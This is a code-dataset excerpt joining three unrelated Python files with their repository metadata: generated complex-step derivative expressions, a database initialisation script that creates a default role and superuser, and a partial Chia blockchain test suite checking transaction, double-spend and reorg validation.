(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_s*v*(1.0e-50*1j + p23_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_s*v*(1.0e-50*1j + p33_n)*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP23_N*(p33_s*v*(1.0e-50*1j + p33_n)*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
tf*0,
])
print(gx)
tock = toc()
print('N:' + str(tock))
print(fx-gx) | 536.10989 | 8,342 | 0.557189 |
ace09f463b191ee2a7d12b90b6845b2c0cd81773 | 977 | py | Python | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | gma2th/full-stack | fd43b13ade62c5dd7acb9d711400c702593984d4 | [
"MIT"
] | 516 | 2018-03-06T19:20:47.000Z | 2022-03-30T22:22:11.000Z | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | ohld/full-stack | cc2f9753f268a7e1264dd01b888f587c3a45c9a2 | [
"MIT"
] | 23 | 2018-03-21T19:38:40.000Z | 2020-12-27T23:08:09.000Z | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | ohld/full-stack | cc2f9753f268a7e1264dd01b888f587c3a45c9a2 | [
"MIT"
] | 85 | 2018-03-29T16:46:40.000Z | 2022-01-27T18:47:39.000Z | from app.core import config
from app.core.security import pwd_context
from app.db.utils import (
get_role_by_name,
create_role,
get_user_by_username,
create_user,
assign_role_to_user,
)
from app.core.security import get_password_hash
from app.models.user import User
from app.models.role import Role
def init_db(db_session):
# Tables should be created with Alembic migrations
# But if you don't want to use migrations, create
# the tables uncommenting the next line
# Base.metadata.create_all(bind=engine)
role = get_role_by_name("default", db_session)
if not role:
role = create_role("default", db_session)
user = get_user_by_username(config.FIRST_SUPERUSER, db_session)
if not user:
user = create_user(
db_session,
config.FIRST_SUPERUSER,
config.FIRST_SUPERUSER_PASSWORD,
is_superuser=True,
)
assign_role_to_user(role, user, db_session)
| 27.138889 | 67 | 0.702149 |
ace09f67c1ff8f6a43a0a8653641043bd3520dfd | 40,440 | py | Python | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
] | 16 | 2021-07-07T08:21:28.000Z | 2022-02-09T04:28:42.000Z | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
] | null | null | null | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
] | 1 | 2021-09-03T13:06:34.000Z | 2021-09-03T13:06:34.000Z | import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from chia.consensus.blockchain import ReceiveBlockResult
from chia.protocols import full_node_protocol
from chia.types.announcement import Announcement
from chia.types.condition_opcodes import ConditionOpcode
from chia.types.condition_with_args import ConditionWithArgs
from chia.types.spend_bundle import SpendBundle
from chia.util.errors import ConsensusError, Err
from chia.util.ints import uint64
from tests.wallet_tools import WalletTool
from tests.core.full_node.test_full_node import connect_and_get_peer
from tests.setup_nodes import bt, setup_two_nodes, test_constants
from tests.util.generator_tools_testing import run_and_get_removals_and_additions
BURN_PUZZLE_HASH = b"0" * 32
WALLET_A = WalletTool(test_constants)
WALLET_A_PUZZLE_HASHES = [WALLET_A.get_new_puzzlehash() for _ in range(5)]
log = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestBlockchainTransactions:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
@pytest.mark.asyncio
async def test_basic_blockchain_tx(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
peer = await connect_and_get_peer(server_1, server_2)
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block), None)
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
assert spend_bundle is not None
tx: full_node_protocol.RespondTransaction = full_node_protocol.RespondTransaction(spend_bundle)
await full_node_api_1.respond_transaction(tx, peer)
sb = full_node_1.mempool_manager.get_spendbundle(spend_bundle.name())
assert sb is spend_bundle
last_block = blocks[-1]
next_spendbundle, additions, removals = await full_node_1.mempool_manager.create_bundle_from_mempool(
last_block.header_hash
)
assert next_spendbundle is not None
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=next_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
await full_node_1.respond_block(full_node_protocol.RespondBlock(next_block))
assert next_block.header_hash == full_node_1.blockchain.get_peak().header_hash
added_coins = next_spendbundle.additions()
# Two coins are added, main spend and change
assert len(added_coins) == 2
for coin in added_coins:
unspent = await full_node_1.coin_store.get_coin_record(coin.name())
assert unspent is not None
assert not unspent.spent
assert not unspent.coinbase
@pytest.mark.asyncio
async def test_validate_blockchain_with_double_spend(self, two_nodes):
num_blocks = 5
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_3, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1001, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DOUBLE_SPEND
@pytest.mark.asyncio
async def test_validate_blockchain_duplicate_output(self, two_nodes):
num_blocks = 3
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DUPLICATE_OUTPUT
@pytest.mark.asyncio
async def test_validate_blockchain_with_reorg_double_spend(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
blocks_spend = bt.get_consecutive_blocks(
1,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
# Move chain to height 10, with a spend at height 10
for block in blocks_spend:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Reorg at height 5, add up to and including height 12
new_blocks = bt.get_consecutive_blocks(
7,
blocks[:6],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
seed=b"another seed",
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend the same coin in the new reorg chain at height 13
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
# But can't spend it twice
new_blocks_double = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks_double[-1])
assert err is Err.DOUBLE_SPEND
assert res == ReceiveBlockResult.INVALID_BLOCK
# Now test Reorg at block 5, same spend at block height 12
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:12],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 12 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend at height 13 is also OK (same height)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:13],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 13 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend at height 14 is not OK (already spend)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:14],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 14 is double spend",
)
with pytest.raises(ConsensusError):
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_coin(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
